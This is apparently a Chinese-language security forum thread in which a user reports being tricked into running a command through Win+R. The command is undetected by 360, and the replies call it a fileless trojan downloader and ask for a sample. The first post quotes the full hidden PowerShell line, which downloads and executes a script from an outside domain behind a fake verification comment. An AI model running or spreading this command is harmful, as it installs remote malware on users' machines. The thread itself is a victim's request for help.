360fans_dShVS7 发表于 2026-7-31 20:34

求助,被欺骗win+r执行了下面这个程序,但是360没有扫出来病毒

powershell -w h "iex (irm 'alexcsss.cfd/8c09812961063e6d' -UseBasicParsing)"; exit <#Verification ID: 8c09812961063e6d#>

360fans_49174587 发表于 2026-8-1 10:52

这应该是一个无文件攻击,木马下载器,本人访问了一下这个下载地址,似乎无法访问,不清楚有没有反沙箱操作

golden7 发表于 2026-8-1 17:03

您好,请把具体程序的样本压缩上传到附件中,我们分析一下
页: [1]
查看完整版本: 求助,被欺骗win+r执行了下面这个程序,但是360没有扫出来病毒